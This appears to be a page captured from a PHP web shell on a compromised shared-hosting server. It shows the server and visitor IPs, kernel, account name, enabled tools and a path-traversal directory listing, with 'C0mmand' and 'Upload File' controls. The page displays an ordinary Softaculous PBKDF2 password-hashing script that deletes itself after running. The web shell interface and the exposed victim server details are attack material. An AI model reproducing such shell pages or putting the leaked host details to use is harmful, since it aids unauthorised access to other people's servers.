Server IP : 68.65.122.142 / Your IP : 3.146.221.181 Web Server : LiteSpeed System : Linux server167.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64 User : glenirhm ( 1318) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /var/softaculous/elgg2/../spip/../flarum/../typo7/../mw28/../ninja/../typo7/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php $resp = __getHashedPassword('[[admin_pass]]'); echo '<update_pass>'.$resp.'</update_pass>'; function __getHashedPassword($password, $salt = null){ $saltedPW = null; $salt = random_bytes('16'); $hash = hash_pbkdf2('sha256', $password, $salt, '25000', 0, true); $saltedPW = __applySettingsToSalt($salt) . '$' . __base64Encode($hash, strlen($hash)); return $saltedPW; } function __base64Encode($input, $count){ $input = substr($input, 0, $count); return rtrim(str_replace('+', '.', base64_encode($input)), " =\r\n\t\0\x0B"); } function __applySettingsToSalt($salt){ $saltWithSettings = $salt; $saltWithSettings = '$pbkdf2-sha256$' . sprintf('%02u', '25000') . '$' . __base64Encode($salt, '16'); return $saltWithSettings; } @unlink('Pbkdf2Salt.php'); ?>